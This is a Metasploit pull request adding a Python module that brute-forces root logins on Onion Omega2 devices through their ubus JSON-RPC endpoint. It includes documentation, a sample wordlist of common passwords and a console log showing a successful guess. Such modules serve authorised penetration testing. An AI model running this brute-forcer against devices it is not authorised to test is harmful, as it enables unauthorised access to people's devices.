### PR TITLE
Add http login scanner for Onion Omega2 devices

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/onion_omega2_login.md
+++ b/documentation/modules/auxiliary/scanner/http/onion_omega2_login.md
@@ -1,3 +1,4 @@
+## Description
 The onion_omega2_login module is used to brute-force credentials for Onion Omage2 devices.
 
 ## Vulnerable Application

--- a/documentation/modules/auxiliary/scanner/http/onion_omega2_login.md
+++ b/documentation/modules/auxiliary/scanner/http/onion_omega2_login.md
@@ -1,0 +1,71 @@
+The onion_omega2_login module is used to brute-force credentials for Onion Omage2 devices.
+
+## Vulnerable Application
+* Onion Omage2 HTTPd Service
+
+![Onion Omega2](https://raw.githubusercontent.com/OnionIoT/Onion-Docs/master/Omega2/Documentation/Get-Started/img/unbox-6-omega-led-detail.jpg)
+
+![Onion Omega2 OnionOS Web Page](https://i.imgur.com/nrHnQaW.png)
+
+## Verification Steps
+1. Plug your Onion Omega2 device to a power source. 
+    - First time setup can be found [here](https://docs.onion.io/omega2-docs/first-time-setup.html)
+2. Connect to its Wi-Fi network.
+3. Start `msfconsole`
+4. Do: `use auxiliary/scanner/http/onion_omega2_login`
+5. Do: `set RHOSTS 192.168.3.1`
+6. Do: `set USERPASS_FILE <user pass dictionary>`
+    - username and password seperated by space and one pair per line.
+7. Do: `run`
+
+Sample userpass file:
+```text
+root 123456
+root password
+root 123456789
+root 12345678
+root 12345
+root 10601
+root qwerty
+root 123123
+root 111111
+root abc123
+root 1234567
+root dragon
+root 1q2w3e4r
+root sunshine
+root 654321
+root master
+```
+
+## Scenario 
+```
+msf5 > use auxiliary/scanner/http/onion_omega2_login
+msf5 auxiliary(scanner/http/onion_omega2_login) > set RHOSTS 192.168.3.1
+RHOSTS => 192.168.3.1
+msf5 auxiliary(scanner/http/onion_omega2_login) > set USERPASS_FILE something.txt
+USERPASS_FILE => something.txt
+msf5 auxiliary(scanner/http/onion_omega2_login) > run
+
+[*] Running for 192.168.3.1...
+[*] 192.168.3.1:80 - [ 1/16] - root:123456 - Failure
+[!] No active DB -- Credential data will not be saved!
+[*] 192.168.3.1:80 - [ 2/16] - root:password - Failure
+[*] 192.168.3.1:80 - [ 3/16] - root:123456789 - Failure
+[*] 192.168.3.1:80 - [ 4/16] - root:12345678 - Failure
+[*] 192.168.3.1:80 - [ 5/16] - root:12345 - Failure
+[+] Ubus RPC Session: 403e133730879d23a2a0df022e19c19c
+[+] 192.168.3.1:80 - [ 6/16] - root:10601 - Success
+[*] 192.168.3.1:80 - [ 7/16] - root:qwerty - Failure
+[*] 192.168.3.1:80 - [ 8/16] - root:123123 - Failure
+[*] 192.168.3.1:80 - [ 9/16] - root:111111 - Failure
+[*] 192.168.3.1:80 - [10/16] - root:abc123 - Failure
+[*] 192.168.3.1:80 - [11/16] - root:1234567 - Failure
+[*] 192.168.3.1:80 - [12/16] - root:dragon - Failure
+[*] 192.168.3.1:80 - [13/16] - root:1q2w3e4r - Failure
+[*] 192.168.3.1:80 - [14/16] - root:sunshine - Failure
+[*] 192.168.3.1:80 - [15/16] - root:654321 - Failure
+[*] 192.168.3.1:80 - [16/16] - root:master - Failure
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/onion_omega2_login.py
+++ b/modules/auxiliary/scanner/http/onion_omega2_login.py
@@ -28,7 +28,7 @@ metadata = {
     ],
     'type': 'single_host_login_scanner',
     'options': {
-        'rhost': {'type': 'address', 'description': 'Host to target', 'required': True, 'default': '192.168.3.1'},
+        'rhost': {'type': 'address', 'description': 'Host to target', 'required': True},
         'rport': {'type': 'port', 'description': 'Port to target', 'required': True, 'default': '80'},
         'userpass': {'type': 'string', 'description': 'A list of username/password combinations to try',
                      'required': False},

--- a/modules/auxiliary/scanner/http/onion_omega2_login.py
+++ b/modules/auxiliary/scanner/http/onion_omega2_login.py
@@ -1,0 +1,82 @@
+#!/usr/bin/env python2.7
+# -*- coding: utf-8 -*-
+# 2019-03-27 05-55
+
+# Standard Modules
+from metasploit import module, login_scanner
+import json
+
+# Extra Modules
+dependencies_missing = False
+try:
+    import requests
+except ImportError:
+    dependencies_missing = True
+
+# Metasploit Metadata
+metadata = {
+    'name': 'Onion Omega2 Login Brute-Force',
+    'description': '''
+        OnionOS login scanner module for Onion Omega2 devices.
+    ''',
+    'authors': [
+        'Not So Attractive <github.com/nsa>'
+    ],
+    'date': '2019-03-27',
+    'license': 'MSF_LICENSE',
+    'references': [
+    ],
+    'type': 'single_host_login_scanner',
+    'options': {
+        'rhost': {'type': 'address', 'description': 'Host to target', 'required': True, 'default': '192.168.3.1'},
+        'rport': {'type': 'port', 'description': 'Port to target', 'required': True, 'default': '80'},
+        'userpass': {'type': 'string', 'description': 'A list of username/password combinations to try',
+                     'required': False},
+        'sleep_interval': {'type': 'float', 'description': 'Time in seconds to wait between login attempts',
+                           'required': False}
+    },
+    'service_name': 'Onion Omega2 HTTPd Ubus',
+}
+
+
+def valid_login(host, rport, username, password):
+    payload = {
+        "jsonrpc": "2.0", "id": 0, "method": "call", "params": ["0" * 32, "session", "login",
+                                                                {
+                                                                    "username": username,
+                                                                    "password": password
+                                                                }]}
+    url = 'http://' + str(host) + ':' + str(rport) + '/ubus'
+    session = requests.Session()
+    try:
+        request = session.post(url, json=payload)
+        response = json.loads(request.text)
+        if response['result'][0] != 6 and len(response['result']) > 1:
+            ubus_rpc_session = response['result'][1]['ubus_rpc_session']
+            module.log('Ubus RPC Session: ' + ubus_rpc_session, level='good')
+        else:
+            return False
+    except requests.exceptions.ConnectionError:
+        module.log("Unhandled exception: ConnectionError", level='error')
+        return False
+    except ValueError:
+        module.log("Unhandled exception: Response JSON DecodeError", level='error')
+        return False
+    except KeyError:
+        module.log("Unhandled exception: Dictionary KerError in Response", level='error')
+        return False
+    else:
+        return True
+
+
+def run(args):
+    if dependencies_missing:
+        module.log('Python requests module missing, cannot continue', level='error')
+        return
+    scanner = login_scanner.make_scanner(
+        lambda host, rport, username, password: valid_login(host, rport, username, password))
+    scanner(args)
+
+
+if __name__ == '__main__':
+    module.run(metadata, run)


### PR DESCRIPTION
The onion_omega2_login module is used to brute-force credentials for Onion Omage2 devices.

## Vulnerable Application
* Onion Omage2 HTTPd Service

![Onion Omega2](https://raw.githubusercontent.com/OnionIoT/Onion-Docs/master/Omega2/Documentation/Get-Started/img/unbox-6-omega-led-detail.jpg)

![Onion Omega2 OnionOS Web Page](https://i.imgur.com/nrHnQaW.png)

## Verification Steps
1. Plug your Onion Omega2 device to a power source. 
    - First time setup can be found [here](https://docs.onion.io/omega2-docs/first-time-setup.html)
2. Connect its Wi-Fi network.
3. Start `msfconsole`
4. Do: `use auxiliary/scanner/http/onion_omega2_login`
5. Do: `set RHOSTS 192.168.3.1`
6. Do: `set USERPASS_FILE <user pass dictionary>`
    - username and password seperated by space and one pair per line.
7. Do: `run`

Sample userpass file:
```text
root 123456
root password
root 123456789
root 12345678
root 12345
root 10601
root qwerty
root 123123
root 111111
root abc123
root 1234567
root dragon
root 1q2w3e4r
root sunshine
root 654321
root master
```

## Scenario 
```
msf5 > use auxiliary/scanner/http/onion_omega2_login
msf5 auxiliary(scanner/http/onion_omega2_login) > set RHOSTS 192.168.3.1
RHOSTS => 192.168.3.1
msf5 auxiliary(scanner/http/onion_omega2_login) > set USERPASS_FILE something.txt
USERPASS_FILE => something.txt
msf5 auxiliary(scanner/http/onion_omega2_login) > run

[*] Running for 192.168.3.1...
[*] 192.168.3.1:80 - [ 1/16] - root:123456 - Failure
[!] No active DB -- Credential data will not be saved!
[*] 192.168.3.1:80 - [ 2/16] - root:password - Failure
[*] 192.168.3.1:80 - [ 3/16] - root:123456789 - Failure
[*] 192.168.3.1:80 - [ 4/16] - root:12345678 - Failure
[*] 192.168.3.1:80 - [ 5/16] - root:12345 - Failure
[+] Ubus RPC Session: 403e133730879d23a2a0df022e19c19c
[+] 192.168.3.1:80 - [ 6/16] - root:10601 - Success
[*] 192.168.3.1:80 - [ 7/16] - root:qwerty - Failure
[*] 192.168.3.1:80 - [ 8/16] - root:123123 - Failure
[*] 192.168.3.1:80 - [ 9/16] - root:111111 - Failure
[*] 192.168.3.1:80 - [10/16] - root:abc123 - Failure
[*] 192.168.3.1:80 - [11/16] - root:1234567 - Failure
[*] 192.168.3.1:80 - [12/16] - root:dragon - Failure
[*] 192.168.3.1:80 - [13/16] - root:1q2w3e4r - Failure
[*] 192.168.3.1:80 - [14/16] - root:sunshine - Failure
[*] 192.168.3.1:80 - [15/16] - root:654321 - Failure
[*] 192.168.3.1:80 - [16/16] - root:master - Failure
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```